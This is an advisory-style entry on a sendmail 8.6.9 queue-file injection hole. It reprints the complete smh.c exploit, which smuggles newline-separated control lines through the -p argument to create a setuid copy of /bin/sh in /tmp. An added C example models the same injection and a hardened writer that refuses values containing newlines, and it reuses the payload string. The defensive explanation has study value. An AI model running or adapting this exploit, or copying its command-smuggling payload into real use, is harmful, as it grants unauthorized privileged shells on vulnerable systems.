COMMAND

    sendmail

SYSTEMS AFFECTED

    Systems running sendmail 8.6.9.

PROBLEM

/* smh.c - Michael R. Widner - atreus (2/27/95)

A quick hack to abuse sendmail 8.6.9, or whatever else is subject to
this hole.  It's really just a matter of passing newlines in arguments
to sendmail and getting the stuff into the queue files.  If we run this
locally with -odq we are guaranteed that it will be queued, rather than
processed immediately.  Wait for the queue to get processed
automatically, or just run sendmail -q if you're impatient.

usage: smh [ username [/path/to/sendmail]]

It's worth noting that this is generally only good for getting bin.
sendmail still wants to process the sendmail.cf file, which contains
Ou1 and Og1 most of the time, limiting you to bin access.  Is there a
way around this?

cc -o smh smh.c should do the trick.  This just creates a bin-owned,
mode 6777 copy of /bin/sh in /tmp called /tmp/newsh.  Note that on some
systems this is pretty much worthless, but you're smart enough to know
which systems those are.  Aren't you?
*/

#include <stdio.h>
#include <unistd.h>

int main(int argc, char **argv)
{
        /* Run sendmail with -odq so the message is only queued.  The -p
         * argument is the protocol string sendmail records in the queue
         * control file ($r line); the newlines embedded in it turn the
         * rest of the argument into extra control lines (Croot, two M
         * lines, and two R program recipients that copy /bin/sh to
         * /tmp/newsh and make it setuid).  Optional argv[1] is the
         * recipient name, optional argv[2] the path to sendmail. */
        execlp(argc > 2 ? argv[2] : "sendmail", "sendmail", "-odq", "-p",
               "ascii\n"
               "Croot\n"
               "Mprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\n"
               "Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u\n"
               "R<\"|/bin/cp /bin/sh /tmp/newsh\">\n"
               "R<\"|/bin/chmod 6777 /tmp/newsh\">\n"
               "$rascii ",
               argc > 1 ? argv[1] : "atreus", (char *)0);
        perror("execlp");       /* only reached if sendmail could not be run */
        return 1;
}
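The exploit works because the queue control file is line-oriented and the
-p value is copied into it verbatim, so a newline in that value ends the
record early and everything after it is stored as further control lines.
The following is an added illustration of that injection class and of the
check that closes it; it is not sendmail's queue code and not part of the
original smh.c.  It assumes a simplified control-file format (one record
per line, keyed by its first character: "R" recipient, "$r" protocol), a
naive writer that copies values unchanged, and a hardened writer that
refuses values containing a line terminator.

```c
/* qf_inject.c - added example, not from the original page.  Models a
 * simplified line-oriented queue control file (assumption: one record per
 * line, "R" = recipient, "$r" = protocol set by "sendmail -p"). */
#include <stdio.h>
#include <string.h>

#define QF_MAX 1024

/* Naive writer: the -p value is stored verbatim after "$r".  A value that
 * contains '\n' terminates the record early and the remainder is written
 * out as additional control lines.  Returns bytes written, or -1. */
int build_qf_unsafe(char *out, size_t outsz, const char *recipient,
                    const char *proto)
{
    int n = snprintf(out, outsz, "R%s\n$r%s\n", recipient, proto);
    return (n < 0 || (size_t)n >= outsz) ? -1 : n;
}

/* Hardened writer: no record value may contain a line terminator.
 * Rejecting is preferable to escaping here, because the reader would
 * also have to be taught the escape convention. */
int build_qf_safe(char *out, size_t outsz, const char *recipient,
                  const char *proto)
{
    if (strpbrk(recipient, "\r\n") != NULL || strpbrk(proto, "\r\n") != NULL)
        return -1;
    return build_qf_unsafe(out, outsz, recipient, proto);
}

/* Reader side: count recipient ("R") lines exactly as a line-oriented
 * parser sees them.  Program recipients like R<"|cmd"> are what smh.c
 * smuggles into the file. */
int count_recipient_lines(const char *qf)
{
    int count = 0;
    const char *line = qf;
    while (*line != '\0') {
        if (line[0] == 'R')
            count++;
        const char *nl = strchr(line, '\n');
        if (nl == NULL)
            break;
        line = nl + 1;
    }
    return count;
}

/* How many recipients a queue file ends up with when the naive writer
 * stores PROTO for a single legitimate recipient; 1 means no injection. */
int recipients_with_unsafe_writer(const char *proto)
{
    char buf[QF_MAX];
    if (build_qf_unsafe(buf, sizeof buf, "atreus", proto) < 0)
        return -1;
    return count_recipient_lines(buf);
}

/* 1 if the hardened writer accepts PROTO, 0 if it refuses it. */
int safe_writer_accepts(const char *proto)
{
    char buf[QF_MAX];
    return build_qf_safe(buf, sizeof buf, "atreus", proto) >= 0;
}

int main(void)
{
    /* Constructed payload in the shape of smh.c's -p argument. */
    const char *payload =
        "ascii\nR<\"|/bin/cp /bin/sh /tmp/newsh\">\n"
        "R<\"|/bin/chmod 6777 /tmp/newsh\">";

    printf("benign -p ascii   : %d recipient(s)\n",
           recipients_with_unsafe_writer("ascii"));
    printf("newline payload   : %d recipient(s)\n",
           recipients_with_unsafe_writer(payload));
    printf("hardened accepts payload? %d\n", safe_writer_accepts(payload));
    return 0;
}
```

With the naive writer the benign value yields one recipient while the
payload yields three (the legitimate one plus the two injected program
recipients); the hardened writer refuses the payload outright.  The same
rule applies to any field that is later parsed line by line: validate at
the write boundary, not only at the parser.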